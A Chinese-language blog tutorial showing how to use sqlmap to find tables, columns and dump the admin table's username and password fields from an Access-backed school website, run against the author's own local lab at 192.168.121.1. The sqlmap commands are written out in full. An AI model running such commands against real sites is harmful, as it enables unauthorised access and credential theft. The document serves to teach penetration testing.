欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

Sqlmap简单注入access数据库教程

程序员文章站 2022-06-22 20:16:03
什么是SQLMap? SqlMap是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞和接管数据库服务器的过程。它通过了一个强大的检测引擎,最终渗透测试和广泛的从数据库中的指纹持...
什么是SQLMap?

SqlMap是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞和接管数据库服务器的过程。它通过了一个强大的检测引擎,最终渗透测试和广泛的从数据库中的指纹持久的开关,从数据库中提取数据,访问底层的文件系统和操作系统执行命令的许多利基功能带外连接。

项目网站:http://sqlmap.sourceforge.net/

支持的数据库:MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB,几乎囊括了市面上所有的数据库

对于Sqlmap的强悍,用过了才知道

下面通过一个简单的实例演示:

测试环境:Backtrack 5&windows7(x64)sqlmap/1.0-dev(r4405)

本打算用windows2003下的iis环境,可惜电脑配置跑不动两个虚拟机,直接在本机win7下用小旋风搭建iis,虚拟机开Backtrack 5跑sqlmap.

Sqlmap简单注入access数据库教程

我这里用的是”校无忧学校网站 ”源码,

Sqlmap简单注入access数据库教程

注入点的查找不多说,这里找到一个:http://192.168.121.1/NewsView.asp?id=8

我这里只获得列名,表名,和内容.Backtrack 5运行我们的Sqlmap神器,

输入命令:python sqlmap.py -u http://192.168.121.1/NewsView.asp?id=8 –tables

Sqlmap简单注入access数据库教程

是否列表名,选Y

 Sqlmap简单注入access数据库教程

设置线程,我这里设置8

Sqlmap简单注入access数据库教程

只需要一分钟不到,表段就爆出来了

Sqlmap简单注入access数据库教程

下面爆字段,输入命令:python sqlmap.py -u http://192.168.121.1/NewsView.asp?id=8 –columns -T ” admin”查看admin表所在的列名

Sqlmap简单注入access数据库教程

速度一样飞快

Sqlmap简单注入access数据库教程

获取内容,python sqlmap.py -u http://192.168.121.1/NewsView.asp?id=8 –dump -C “username,password” -T “admin”

Sqlmap简单注入access数据库教程

这只是Sqlmap功能的九牛一毛,若想深入了解,推荐阅读Sqlmap说明文件